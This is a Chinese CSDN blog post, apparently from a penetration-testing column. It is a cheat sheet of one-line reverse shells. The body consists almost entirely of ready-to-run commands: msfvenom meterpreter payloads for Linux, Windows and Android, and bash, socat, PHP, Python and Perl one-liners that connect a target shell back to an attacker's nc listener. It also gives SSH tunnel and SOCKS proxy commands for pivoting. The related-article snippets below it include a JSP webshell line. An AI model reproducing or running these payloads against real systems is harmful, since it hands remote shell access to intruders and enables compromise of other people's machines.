一句话反弹shell

最新推荐文章于 2023-07-12 23:09:14 发布
最新推荐文章于 2023-07-12 23:09:14 发布
阅读量3k 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_Z_W_/article/details/104411393
版权

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o isshell

Windows

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=121.196.209.139 LPORT=4444 -f exe > abc.exe

Android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

bash

目标机器:bash -i >& /dev/tcp/192.168.118.138/1234 0>&1

攻击机器:nc -lvvp 1234

socat

攻击机器:socat tcp-listen:6666 -

目标机器:socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.118.138:6666

Php脚本反弹

目标机器:php -r '$sock=fsockopen("192.168.118.138",8888);exec("/bin/sh -i <&3 >&3 2>&3");'

攻击机器:nc -lvvp 8888

Python脚本反弹

目标机器:

python -c '
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.118.138",8080));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
'

攻击机器:nc -lvvp 8080

Perl脚本反弹
目标机器:

perl -e '
use Socket;
$i="10.0.0.1";
$p=1234;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if
(connect(S,sockaddr_in($p,inet_aton($i)))){
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
}
;
'

攻击机器:nc -lvvp 1234

SSH

主机A不能直接访问主机C,但是主机A可以访问主机B,主机B又可以访问C(A➡B➡C)

正向隧道:ssh -qTfnN -L port:host:hostport -l user remote_ip

主机A不能直接访问主机B和C,但是主机B可以访问主机A和主机C(A⬅B➡C)

反向隧道:ssh -qTfnN -R port:host:hostport -l user remote_ip

socks代理:ssh -qTfnN -D port remotehost

小晓晓晓林
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
常用一句话反弹shell总结
weixin_45116657的博客
10-19 1212
哈哈哈
Windows 反弹shell方法
weixin_53747497的博客
07-12 2057
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
渗透测试-window反弹shell
lza20001103的博客
05-11 3957
window反弹shell
反弹shell--bash一句话解析
小刚的博客
01-10 2967
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 反弹shell解析bash反弹shell解析拆分语句了解一下交互式连接设备文件描述符合并输入输出大合并 bash反弹shell解析 最基础的反弹shell语句,这么久只会用,但不知道其中的奇妙之处 真是妙蛙种子被踢出了米奇妙妙屋。。。 bash -i >& /dev/tcp/192.168.1.1/8888 0>&1 拆分语句了解一下 交互式 bash -i是打开一个.
linux各种一句话反弹shell总结
mingyqf的博客
01-18 1195
【技术分享】linux各种一句话反弹shell总结 阅读量 1355554 | 评论 2 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jT8KDx3o-1642484911491)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhX
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
ASPX一句话shell客户端
06-16
ASPX一句话shell客户端+ASPXshell MS08-067插件.rar
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...
JSP脚本反弹程序
10-20
实现shell反弹到指定地址,进行交互式SHELL管理!
常用的一句话反弹shell总结
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
Windows系统反弹shell常见方法总结
Bird&Bird
07-17 3100
目录一、Powercat反弹shell二、Nishang反弹shell三、UDP反弹shell四、Metasploit反弹shell五、nc反弹 一、Powercat反弹shell powercat下载: powercat. powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种: 其一:下载powercat.ps1至本地,并加载 其二:从URL加载 powershell IEX (New-Object System.Net.Webclient).DownloadStri
反弹shell学习
E1even的博客
07-24 290
简单讲一下反弹shell: 什么是shell? linux的终端就是shell,相当于windows下的cmd.exe 反弹shell的原理到底是什么: 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 这里有个地方初学者不是很好理解:目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 那么这句话的实质操作是什么呢? 本质就是目标机对攻击机发起了TCP请求,既然有了请求,那么必然有输入和输出。而我们
Java安全-Java Web后门学习 Jsp 一句话分析
Love&Share
05-03 2292
文章目录Java Web后门一句话木马反射调用类加载(冰蝎马实现方式)ELSE参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 一句话木马 最简单的 jsp 一句话木马 <% Runtime.getRuntime().exec(request.getParameter("i"));%> .
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
一句话反弹shell代码
最新发布
09-10
一句话反弹shell代码是一种常见的恶意代码,攻击者通常通过利用漏洞将这段代码注入到目标服务器的Web应用程序中。 以下是一个简单的一句话反弹shell代码的示例: ``` $sock=fsockopen("攻击者的IP地址",攻击者的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值